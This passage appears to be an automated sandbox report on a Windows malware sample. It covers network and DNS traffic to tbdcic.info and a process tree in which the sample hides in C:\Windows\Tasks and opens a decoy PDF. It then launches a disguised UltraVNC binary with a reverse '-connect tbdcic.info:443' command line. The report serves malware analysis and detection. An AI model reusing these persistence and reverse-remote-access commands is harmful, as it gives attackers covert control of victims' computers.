MSVCRT.dll	??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 13:37:42.853419065 CET	49738	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:37:42.853450060 CET	443	49738	194.190.152.201	192.168.2.5
Dec 23, 2024 13:37:42.853645086 CET	49738	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:37:42.853758097 CET	49738	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:37:42.853771925 CET	443	49738	194.190.152.201	192.168.2.5
Dec 23, 2024 13:37:42.853813887 CET	443	49738	194.190.152.201	192.168.2.5
Dec 23, 2024 13:37:42.965095043 CET	49739	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:37:42.965133905 CET	443	49739	194.190.152.201	192.168.2.5
Dec 23, 2024 13:37:42.965323925 CET	49739	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:37:42.965395927 CET	49739	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:37:42.965404034 CET	443	49739	194.190.152.201	192.168.2.5
Dec 23, 2024 13:37:42.965430021 CET	443	49739	194.190.152.201	192.168.2.5
Dec 23, 2024 13:37:54.247061014 CET	49767	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:37:54.247109890 CET	443	49767	194.190.152.201	192.168.2.5
Dec 23, 2024 13:37:54.247334003 CET	49767	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:37:54.247526884 CET	49767	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:37:54.247539997 CET	443	49767	194.190.152.201	192.168.2.5
Dec 23, 2024 13:37:54.247597933 CET	443	49767	194.190.152.201	192.168.2.5
Dec 23, 2024 13:38:16.758567095 CET	49815	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:38:16.758614063 CET	443	49815	194.190.152.201	192.168.2.5
Dec 23, 2024 13:38:16.758722067 CET	49815	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:38:16.758826017 CET	49815	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:38:16.758833885 CET	443	49815	194.190.152.201	192.168.2.5
Dec 23, 2024 13:38:16.758938074 CET	443	49815	194.190.152.201	192.168.2.5
Dec 23, 2024 13:38:50.093080997 CET	49894	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:38:50.093132973 CET	443	49894	194.190.152.201	192.168.2.5
Dec 23, 2024 13:38:50.093242884 CET	49894	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:38:50.093342066 CET	49894	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:38:50.093354940 CET	443	49894	194.190.152.201	192.168.2.5
Dec 23, 2024 13:38:50.093422890 CET	443	49894	194.190.152.201	192.168.2.5
Dec 23, 2024 13:39:35.609105110 CET	49994	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:39:35.609159946 CET	443	49994	194.190.152.201	192.168.2.5
Dec 23, 2024 13:39:35.609253883 CET	49994	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:39:35.609430075 CET	49994	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:39:35.609442949 CET	443	49994	194.190.152.201	192.168.2.5
Dec 23, 2024 13:39:35.609493017 CET	443	49994	194.190.152.201	192.168.2.5
Dec 23, 2024 13:40:31.212028980 CET	49997	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:40:31.212091923 CET	443	49997	194.190.152.201	192.168.2.5
Dec 23, 2024 13:40:31.212197065 CET	49997	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:40:31.212282896 CET	49997	443	192.168.2.5	194.190.152.201
Dec 23, 2024 13:40:31.212295055 CET	443	49997	194.190.152.201	192.168.2.5
Dec 23, 2024 13:40:31.212428093 CET	443	49997	194.190.152.201	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 13:37:37.045074940 CET	61408	53	192.168.2.5	1.1.1.1
Dec 23, 2024 13:37:42.611947060 CET	50727	53	192.168.2.5	1.1.1.1
Dec 23, 2024 13:37:42.749808073 CET	53	50727	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 23, 2024 13:37:37.045074940 CET	192.168.2.5	1.1.1.1	0xd3be	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:37:42.611947060 CET	192.168.2.5	1.1.1.1	0xc47c	Standard query (0)	tbdcic.info	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 23, 2024 13:37:37.351146936 CET	1.1.1.1	192.168.2.5	0xd3be	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 23, 2024 13:37:39.133418083 CET	1.1.1.1	192.168.2.5	0xa2c9	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:37:39.133418083 CET	1.1.1.1	192.168.2.5	0xa2c9	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:37:42.749808073 CET	1.1.1.1	192.168.2.5	0xc47c	No error (0)	tbdcic.info		194.190.152.201	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:38:45.647787094 CET	1.1.1.1	192.168.2.5	0x6baa	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 23, 2024 13:38:45.647787094 CET	1.1.1.1	192.168.2.5	0x6baa	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	07:37:22
Start date:	23/12/2024
Path:	C:\Users\user\Desktop\mSRW5AfJpC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\mSRW5AfJpC.exe"
Imagebase:	0x400000
File size:	1'648'766 bytes
MD5 hash:	95BB89EBDCEC89E123E5647555D63AED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	07:37:23
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:37:23
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:37:23
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 4735396734841324 4735396734841324.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:37:23
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:37:23
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	07:37:23
Start date:	23/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	07:37:24
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0xad0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:37:25
Start date:	23/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
Imagebase:	0x7ff686a00000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	07:37:25
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0xad0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:37:26
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /f /im sync_browser.exe
Imagebase:	0x920000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:37:26
Start date:	23/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff6413e0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	07:37:26
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0xad0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:37:26
Start date:	23/12/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,17186980694062401474,5929717192607302477,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff6413e0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	07:37:29
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0xad0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:37:31
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0xad0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:37:33
Start date:	23/12/2024
Path:	C:\Windows\Tasks\sync_browser.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Tasks\sync_browser.exe
Imagebase:	0x7ff740000000
File size:	1'945'368 bytes
MD5 hash:	749B3A68B9C5325D592822EE7C2C17EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000013.00000000.2215667944.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	07:37:33
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 8
Imagebase:	0xad0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:37:41
Start date:	23/12/2024
Path:	C:\Windows\Tasks\sync_browser.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443
Imagebase:	0x7ff740000000
File size:	1'945'368 bytes
MD5 hash:	749B3A68B9C5325D592822EE7C2C17EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.2295744308.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000002.2298861822.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:37:41
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0xad0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:37:43
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 4
Imagebase:	0xad0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:37:47
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 42
Imagebase:	0xad0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:38:29
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 42
Imagebase:	0xad0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:39:11
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 42
Imagebase:	0xad0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:39:53
Start date:	23/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 42
Imagebase:	0xad0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	19.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	26.5%
Total number of Nodes:	1638
Total number of Limit Nodes:	16

Executed Functions

Function 00405721 Relevance: 231.1, APIs: 93, Strings: 38, Instructions: 1811keyboardwindowCOMMON

Download Yara Rule

APIs

?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00405734

Part of subcall function 00401D21: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D2D
Part of subcall function 00401D21: CreateWindowExW.USER32(00000000,Static,004154C8,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401D4A
Part of subcall function 00401D21: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401D5C
Part of subcall function 00401D21: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401D69
Part of subcall function 00401D21: DispatchMessageW.USER32(?), ref: 00401D73
Part of subcall function 00401D21: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D7C
Part of subcall function 00401D21: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405740,?,00000000), ref: 00401D83

GetVersionExW.KERNEL32(?,?,00000000), ref: 00405751
GetCommandLineW.KERNEL32(?,00000020,?,00000000), ref: 004057E2

Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
Part of subcall function 00402DD6: ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC

Part of subcall function 004043F8: lstrlenW.KERNEL32(00405815,00000000,00000020,-00000002,00405815,-00000002,00000000,00000000,00000000), ref: 0040442C
Part of subcall function 004043F8: lstrlenW.KERNEL32(?), ref: 00404434

_wtol.MSVCRT ref: 00405825
??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00419858,00419858), ref: 00405877
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 0040588B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,00419858), ref: 00405893
GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,00000000), ref: 00405909
_wtol.MSVCRT ref: 00405A25
??2@YAPAXI@Z.MSVCRT(00000010,00000000,00419858,00419858), ref: 00405BAD
??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,00000000,00419858,00419858), ref: 00405C30
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,00000000,00419858,00419858), ref: 00405CA6
??3@YAXPAX@Z.MSVCRT(?,?,00000000,00419858,00419858), ref: 00405CC2
??3@YAXPAX@Z.MSVCRT(?,00000000,00419858,00419858), ref: 00405D00
wsprintfW.USER32 ref: 00405D2A

Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE

Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
Part of subcall function 0040269A: ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7

GetCommandLineW.KERNEL32(?,?,00000000,0000000A), ref: 0040604E

Part of subcall function 0040421B: lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
Part of subcall function 0040421B: lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
Part of subcall function 0040421B: _wcsnicmp.MSVCRT ref: 0040423D

_wtol.MSVCRT ref: 00405F6B
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 004060C6
??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 004060CE
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 004060D6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 004060DE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 004060E6
GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 004060F2
SetProcessWorkingSetSize.KERNEL32(00000000), ref: 004060F9
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406116
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040611E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406126
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040612E
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A), ref: 0040614D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 00406167
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 0040616F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406177
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040617F
??3@YAXPAX@Z.MSVCRT(?,?,00000002,?,00000000,?,00000000,0000000A), ref: 0040622E
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,00000000,0000000A), ref: 004062C5
CoInitialize.OLE32(00000000), ref: 004062F2
_wtol.MSVCRT ref: 00406338
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040635A
GetKeyState.USER32(00000010), ref: 004063BE
??3@YAXPAX@Z.MSVCRT(?), ref: 004064F8
??3@YAXPAX@Z.MSVCRT(?), ref: 00406506
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 0040652F
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406537
??3@YAXPAX@Z.MSVCRT(?), ref: 00406553
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040655B
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 0040658B
??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 004065CB
??3@YAXPAX@Z.MSVCRT(?,00419810), ref: 00406634
??3@YAXPAX@Z.MSVCRT(?,?,00419810), ref: 0040663C
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406701
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 0040670C
GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00419810), ref: 00406716
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00419810), ref: 004067D0
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00419810), ref: 004067D8
_wtol.MSVCRT ref: 0040686C
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 00406A4B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?), ref: 00406A53

Part of subcall function 00404F67: memset.MSVCRT ref: 00404F8B
Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000), ref: 00404FE4
Part of subcall function 00404F67: ??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00404FEC

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406A77

Part of subcall function 004023B5: LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
Part of subcall function 004023B5: GetProcAddress.KERNEL32(00000000), ref: 004023CF

??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406AC0
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406AC8
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00406AD0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00406AD6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00406B60
??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 00406B81
??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 00406B89
??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 00406B91
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 00406B97
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00406B9F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 00406BA7
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00406BAF
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00406BCE
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00406BD6
